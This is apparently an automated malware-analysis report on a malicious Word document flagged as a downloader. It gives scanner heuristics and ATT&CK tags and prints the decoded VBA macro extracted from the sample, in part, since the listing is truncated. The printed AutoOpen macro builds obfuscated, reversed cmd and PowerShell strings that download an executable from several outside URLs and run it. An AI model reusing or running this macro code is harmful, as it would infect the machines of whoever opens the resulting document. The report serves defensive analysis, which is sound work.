MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as a malicious downloader by ClamAV. It contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to execute a shell command using obfuscated strings, indicating an intent to download and run a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Emooodldr-6689757-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emooodldr-6689757-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4586 bytes |
SHA-256: a0a79873e65865f1cb187ea2db67f08b05ac400e97bc87b39b8bb67d41e989ac |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Wscntpqj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const nZlbiL = 0
Dim jDJNA(2)
jDJNA(0) = Right(WZZowN, 372)
jDJNA(1) = Mid(pvBzqFj, 335, 633)
Dim Tbjmq(4)
Tbjmq(0) = Right(WZZowN, 372)
Tbjmq(1) = Right(WZZowN, 372)
Tbjmq(2) = MidB(WzAhOII, 387, 402)
Tbjmq(3) = Left(OjUIPalQ, 203)
Dim KzdQdj(3)
KzdQdj(0) = Left(OjUIPalQ, 203)
KzdQdj(1) = Right(WZZowN, 372)
KzdQdj(2) = Right(WZZowN, 372)
Dim SQBwz(4)
SQBwz(0) = Mid(pvBzqFj, 335, 633)
SQBwz(1) = Left(OjUIPalQ, 203)
SQBwz(2) = Mid(pvBzqFj, 335, 633)
SQBwz(3) = Left(OjUIPalQ, 203)
Dim cniwK(5)
cniwK(0) = Left(OjUIPalQ, 203)
cniwK(1) = MidB(WzAhOII, 387, 402)
cniwK(2) = Mid(pvBzqFj, 335, 633)
cniwK(3) = Left(OjUIPalQ, 203)
cniwK(4) = Mid(pvBzqFj, 335, 633)
Dim zEPiL(2)
zEPiL(0) = Left(OjUIPalQ, 203)
zEPiL(1) = Left(OjUIPalQ, 203)
Dim WRLKrj(4)
WRLKrj(0) = Left(OjUIPalQ, 203)
WRLKrj(1) = Mid(pvBzqFj, 335, 633)
WRLKrj(2) = Right(WZZowN, 372)
WRLKrj(3) = MidB(WzAhOII, 387, 402)
Dim spijh(4)
spijh(0) = Right(WZZowN, 372)
spijh(1) = Left(OjUIPalQ, 203)
spijh(2) = Mid(pvBzqFj, 335, 633)
spijh(3) = Left(OjUIPalQ, 203)
Shell@ VICjFhK + piEwjZjJMGzQz + SWwjqDJOoD, CInt(nZlbiL)
Dim AGAlT(3)
AGAlT(0) = Mid(pvBzqFj, 335, 633)
AGAlT(1) = Right(WZZowN, 372)
AGAlT(2) = Right(WZZowN, 372)
Dim CpqRRP(5)
CpqRRP(0) = Right(WZZowN, 372)
CpqRRP(1) = Mid(pvBzqFj, 335, 633)
CpqRRP(2) = Left(OjUIPalQ, 203)
CpqRRP(3) = Left(OjUIPalQ, 203)
CpqRRP(4) = Left(OjUIPalQ, 203)
End Sub
Attribute VB_Name = "UaZLYkqsVh"
Function VICjFhK()
Dim Xjojkb(4)
Xjojkb(0) = MidB(WzAhOII, 387, 402)
Xjojkb(1) = Right(WZZowN, 372)
Xjojkb(2) = Left(OjUIPalQ, 203)
Xjojkb(3) = MidB(WzAhOII, 387, 402)
JZYRNRvh = Format(Chr(9 + 5 + 9 + 14 + 62)) + "md /V^:^O/" + Format(Chr(6 + 3 + 6 + 9 + 43)) + Format(Chr(3 + 1 + 3 + 4 + 23)) + "^s^et ^Q^Iv=^ ^ " + "^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ " + "^}^}{^h" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "ta" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "};^k^aer^b^" + ";^DSR$ me^t^I^-^ekovnI;)^D^SR$" + "^ ,l^jT$(e^liF^da^ol" + "nw^oD^.WWm^$^{^yr^t{)"
Dim pYkHQS(5)
pYkHQS(0) = Left(OjUIPalQ, 203)
pYkHQS(1) = MidB(WzAhOII, 387, 402)
pYkHQS(2) = Right(WZZowN, 372)
pYkHQS(3) = Right(WZZowN, 372)
pYkHQS(4) = Left(OjUIPalQ, 203)
Dim bWVsWs(5)
bWVsWs(0) = Mid(pvBzqFj, 335, 633)
bWVsWs(1) = Left(OjUIPalQ, 203)
bWVsWs(2) = Left(OjUIPalQ, 203)
bWVsWs(3) = Left(OjUIPalQ, 203)
bWVsWs(4) = Left(OjUIPalQ, 203)
FrYOG = "^H^Y^F$^ n^i lj^T^$" + "(h" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "^aerof;^'e^x^e^.^'^" + "+^Hj^d" + "$+^'\^'^+" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "^il^b" + "u^p:vn^e^$=D^SR$;'^49^'^ ^= " + "^Hjd$^;)^" + "'^@^'(t^i^lpS.'1Vs^7^" + "zi^gk9/ur^.lo" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "^e//:p^tth" + "@^wM" + Format(Chr(6 + 3 + 6 + 9 + 43)) + "^78^U^7/mo" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "^.^tre^p^x" + "^eit" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "//:p^tt^" + "h^@6^PK^X" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "^I^t/ri^" + ".b^a^lnai^ps^a" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "//^:^p" + "tt^h^@^w^g^x96NIB^Q/^ur.vo^k"
Dim bNavzv(5)
bNavzv(0) = Right(WZZowN, 372)
bNavzv(1) = MidB(WzAhOII, 387, 402)
bNavzv(2) = MidB(WzAhOII, 387, 402)
bNavzv(3) = MidB(WzAhOII, 387, 402)
bNavzv(4) = Left(OjUIPalQ, 203)
Dim bmtvX(4)
bmtvX(0) = Left(OjUIPalQ, 203)
bmtvX(1) = Left(OjUIPalQ, 203)
bmtvX(2) = Left(OjUIPalQ, 203)
bmtvX(3) = MidB(WzAhOII, 387, 402)
Dim oKRfc(3)
oKRfc(0) = Left(OjUIPalQ, 203)
oKRfc(1) = MidB(WzAhOII, 387, 402)
oKRfc(2) = MidB(WzAhOII, 387, 402)
WwwoKiojUzk = "h" + Format(Chr(9 + 5 + 9 + 14 + 62)) + "^yb^l" + "ina^d//:p^t^t^h@lA^ewn^gxSN^O" + "/m^o" + Format(Chr(9 + 5 + 9 + 14 + 62)) + ".^annema" + "le^ir^b^ag//^" + ":pt^t^h'^=" + "^H^YF$;tn^ei^l" + Format(Chr(6 + 3 + 6 + 9 + 43)) + "^beW^.^t" + "eN t" + Format(Chr(9 + 5 + 9 + 14 + 62)) +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.